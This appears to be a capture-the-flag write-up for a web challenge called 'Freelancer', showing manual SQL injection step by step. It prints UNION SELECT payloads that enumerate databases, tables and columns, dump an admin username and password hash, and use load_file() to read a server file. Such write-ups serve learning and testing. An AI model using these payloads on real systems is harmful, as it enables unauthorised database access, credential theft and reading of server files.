🟠Web: Freelancer

Exploring SQL injection manually (without sqlmap, just browser and URL)

First step: recognition

at first, I looked at the source code of the page:

and then these comments caught my attention

so I checked these pages

• /portfolio.php?id=1

• /portfolio.php?id=2

• /portfolio.php?id=3

It is obvious that they are not separate pages, it's a pattern that changes only the number according to the id

so I tried to make a simple sql injection using the command "order by" to find out how many columns this "id" table has

id= 1 order by 1

id= 1 order by 2

id= 1 order by 3

id= 1 order by 4 (we have an error, so we only have 3 columns)

so we find that there are from tables 1 to 3

to be able to see the information of our sql query, I will use "union select"

to ignore the first sentence, I will change 1 for -1

id=1 union select 1,2,3

=>

id=-1 union select 1,2,3

now, we can view the information in 2 and 3 from this union select

example:

if we change

id=-1 union select 1,2,3

to

id = -1 union select 1,"gabriel","vernilo"

we got this:

and if we use: id=-1 union select 1," ",@@version

we discovered the version of the database

the next part involves knowledge of how mySQL databases work

mySQL databases have by default a table with useful information called information_schema

using this we can get the name of the databases

id=-1 union select 1," ",schema_name from information_schema.schemata

now we know that there are databases: freelancer; information_schema; mysql; performance_schema

now I'll try to get the names of the tables from inside the "freelancer" database

id=-1 union select 1," ",table_name from information_schema.tables where table_schema = "freelancer"

now I will try to see the columns inside the safeadmin table inside the freelance database

id=-1 union select 1," ",column_name from information_schema.columns where table_schema = "freelancer" and table_name = "safeadmin"

now I'll try to see the username column information

id=-1 union select 1," ",username from safeadmin

now we have that the user is safeadm

now I'll try to see the password column information

id=-1 union select 1," ",password from safeadmin

the admins password isn't "$2y$10$s2ZCi/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K"

it's a hash, which I can't break :(

looking for ideas I decided to go back to the initial phase, the recognition

so I did a fuzzing to discover more directories and files

I found the file "/administrat/panel.php" (admin's panel, probably)

in the browser, the page redirects to /administrat/index.php and asks for a login

so I tried to return at portfolios page and read the admin's panel with a SQL command

id=-1 union select 1," ",load_file("/var/www/html/administrat/panel.php")

and this shows us the flag;